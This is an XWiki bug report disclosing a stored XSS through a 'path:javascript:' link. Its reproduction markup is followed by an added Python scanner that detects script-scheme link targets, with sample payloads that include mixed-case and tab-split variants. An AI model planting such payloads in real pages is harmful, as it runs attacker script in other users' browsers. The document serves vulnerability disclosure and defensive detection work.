XWiki Platform / XWIKI-19141

stored XSS on XWiki


Details

    • Type: Bug
    • Resolution: Duplicate
    • Priority: Critical
    • Affects version: 13.9

    Description

      Anyone with write access to an XWiki page can introduce a stored XSS into the page. For more details about the impact: https://cwe.mitre.org/data/definitions/79.html

      Reproduction:
      a) create a wiki page
      b) edit the source and write:

      (((
      (% class="showhidebutton" %)
      (((
      [[Show Example>>path:javascript:prompt("xss on", window.location.hostname)||aria-controls="showhidecontentcontainerinstance-1" data-hide-message="Collapse" data-show-duration="200" data-show-effect="toggle" data-show-message="Show Example" id="showhidebuttontextinstance-1" role="button" style="cursor:pointer"]]
      )))

      (% id="showhidecontentinstance-1" style="display: none;" class="showhidecontent" %)
      (((
      (% aria-expanded="false" id="showhidecontentcontainerinstance-1" role="region" tabindex="-1" class="contentcontainer" %)
      (((
      (% class="box" %)
      (((
      (% class="code" %)
      (((

      )))
      )))
      )))
      )))
      )))

      c) save and click on "Show Example"
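      The root cause in the steps above is a link whose target uses the `path:` type with a `javascript:` URL, which XWiki then emits as the link's href. The following is an added example, not code from the issue or from the XWiki project: a small defender-side scan that walks XWiki 2.1 link markup in a page's source and flags every target whose scheme executes script, so a reviewer or a pre-save hook can catch this pattern before it is stored. The link parsing is a simplified approximation of XWiki 2.1 `[[label>>reference||parameters]]` syntax (an assumption, not XWiki's parser), the function names are hypothetical, and the sample source is constructed for the example; it goes a little beyond the report by also normalising case and the tab/newline characters browsers ignore when reading a scheme.

```python
"""Scan XWiki 2.1 wiki-syntax source for links whose target resolves to a
script-executing URL scheme (the pattern reported in XWIKI-19141).

Assumption: this is a simplified reading of XWiki link markup, not XWiki's
own parser. Function names are hypothetical; the sample source is constructed.
"""
import re

# [[...]] link markup; DOTALL so a link split over lines is still captured.
LINK_RE = re.compile(r"\[\[(?P<body>.+?)\]\]", re.DOTALL)

# Link type prefixes whose remainder is handed to the browser as a URL.
URL_LIKE_PREFIXES = ("path:", "url:")

# Schemes that execute script or inline a document instead of navigating.
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


def link_target(body: str) -> str:
    """Return the reference part of a link body (label>>reference||params)."""
    body = body.split("||", 1)[0]        # drop the link parameters
    if ">>" in body:
        body = body.rsplit(">>", 1)[1]   # drop the label
    return body.strip()


def normalized_scheme_input(target: str) -> str:
    """Strip a URL-like type prefix, remove the ASCII tab/newline/CR bytes
    browsers discard while parsing a scheme, and lowercase the result."""
    lowered = target.lstrip().lower()
    for prefix in URL_LIKE_PREFIXES:
        if lowered.startswith(prefix):
            lowered = lowered[len(prefix):]
            break
    return re.sub(r"[\t\n\r]", "", lowered).lstrip()


def is_script_target(target: str) -> bool:
    """True when the link target would run script rather than navigate."""
    return normalized_scheme_input(target).startswith(SCRIPT_SCHEMES)


def find_script_links(source: str) -> list:
    """Return the raw target of every link in `source` with a script scheme."""
    hits = []
    for match in LINK_RE.finditer(source):
        target = link_target(match.group("body"))
        if is_script_target(target):
            hits.append(target)
    return hits


# Constructed sample page source: three benign links and four that a
# pre-save check should reject (plain, mixed case, tab-split scheme, data:).
SAMPLE_SOURCE = """\
[[Home>>doc:Main.WebHome]]
[[XWiki>>https://www.xwiki.org||rel="noopener"]]
[[Docs>>path:/xwiki/bin/view/Main/]]
[[Show Example>>path:javascript:prompt("xss on", window.location.hostname)||role="button"]]
[[Mixed case>>path:JavaScript:void(0)]]
[[Split scheme>>path:java\tscript:void(0)]]
[[Inline>>data:text/html;base64,SGk=]]
"""

if __name__ == "__main__":
    for target in find_script_links(SAMPLE_SOURCE):
        print("script-scheme link target:", repr(target))
```

      Run stand-alone it lists the four offending targets from the constructed source. The normalisation step matters: a check that only looks for the literal lowercase string `javascript:` would miss `JavaScript:` and `java<TAB>script:`, both of which a browser still treats as the javascript scheme.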
       

      People

        Assignee: Simon Urli (surli)
        Reporter: Chenming Xu (sparrow)
        Votes: 0
        Watchers: 4